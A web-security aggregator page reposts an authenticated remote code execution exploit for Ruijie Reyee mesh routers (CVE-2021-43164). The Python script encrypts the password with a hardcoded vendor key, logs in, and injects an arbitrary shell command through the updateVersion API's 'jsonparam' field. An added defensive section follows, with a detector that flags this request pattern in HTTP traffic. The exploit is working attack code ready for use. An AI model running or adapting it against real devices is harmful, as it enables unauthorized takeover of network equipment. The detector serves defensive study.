HackDig : Dig high-quality web security articles

Ruijie Reyee Mesh Router Remote Code Execution

2022-05-11 17:30
# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
# Google Dork: None
# Date: November 1, 2021
# Exploit Author: Minh Khoa of VSEC
# Vendor Homepage: https://ruijienetworks.com
# Software Link: https://www.ruijienetworks.com/resources/products/1896-1900
# Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
# CVE: CVE-2021-43164

#!/usr/bin/python3

import os
import sys
import time
import requests
import json

def enc(PASS):
    key   = "RjYkhwzx$2018!"
    shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key)
    return os.popen(shell).read().strip()

try:
    TARGET  = sys.argv[1]
    USER    = sys.argv[2]
    PASS    = sys.argv[3]
    COMMAND = sys.argv[4]
except Exception:
    print("CVE-2021-43164 PoC")
    print("Usage:   python3 exploit.py <target> <user> <pass> <command>")
    print("Example: python3 exploit.py admin password 'touch /tmp/pwned'")
    sys.exit(1)

endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET)
payload = {
        "method": "login",
        "params": {
            "username": USER,
            "password": enc(PASS),
            "encry": True,
            "time": int(time.time()),
            "limit": False
            }
        }

r = requests.post(endpoint, json=payload)
sid = json.loads(r.text)["data"]["sid"]

endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid)
payload = {
        "method": "updateVersion",
        "params": {
            "jsonparam": "'; {} #".format(COMMAND)
            }
        }

r = requests.post(endpoint, json=payload)
print(r.text)

Source: cxsecurity.com/issue/WLB-2022050045
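For defenders, the request shape in the PoC above (a POST to /cgi-bin/luci/api/wireless with method "updateVersion" and a "jsonparam" that breaks out of a quoted shell argument) can be matched in captured HTTP traffic. The following is an added detection example, not part of the original PoC or of any vendor tooling; the record format, the function names and the assumption that legitimate "jsonparam" values never contain these shell metacharacters are hypothetical.

```python
import json
import re
from urllib.parse import urlsplit

API_PATH = "/cgi-bin/luci/api/wireless"
# Assumption: a legitimate jsonparam never contains characters that close a
# single-quoted shell argument or chain/substitute a command.
SHELL_META = re.compile(r"['`;|&\n]|\$\(")


def check_request(method, url, body):
    """Return a reason string if the request matches the PoC pattern, else None."""
    if method.upper() != "POST" or urlsplit(url).path != API_PATH:
        return None
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return None
    if not isinstance(doc, dict) or doc.get("method") != "updateVersion":
        return None
    params = doc.get("params")
    value = params.get("jsonparam") if isinstance(params, dict) else None
    if not isinstance(value, str):
        return None
    hit = SHELL_META.search(value)
    if hit:
        return "shell metacharacter {!r} in updateVersion jsonparam".format(hit.group())
    return None


def scan(records):
    """Return (index, reason) for every record that check_request flags."""
    findings = []
    for i, (method, url, body) in enumerate(records):
        reason = check_request(method, url, body)
        if reason:
            findings.append((i, reason))
    return findings


# Constructed sample records (method, URL, JSON body); not real captures.
SAMPLE = [
    ("POST", "/cgi-bin/luci/api/wireless?auth=SID_PLACEHOLDER",
     json.dumps({"method": "updateVersion", "params": {"jsonparam": '{"version": "1.0"}'}})),
    ("POST", "/cgi-bin/luci/api/wireless?auth=SID_PLACEHOLDER",
     json.dumps({"method": "updateVersion", "params": {"jsonparam": "'; touch /tmp/pwned #"}})),
    ("POST", "/cgi-bin/luci/api/auth",
     json.dumps({"method": "login", "params": {"username": "admin"}})),
]

if __name__ == "__main__":
    for index, reason in scan(SAMPLE):
        print("record {}: {}".format(index, reason))
```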
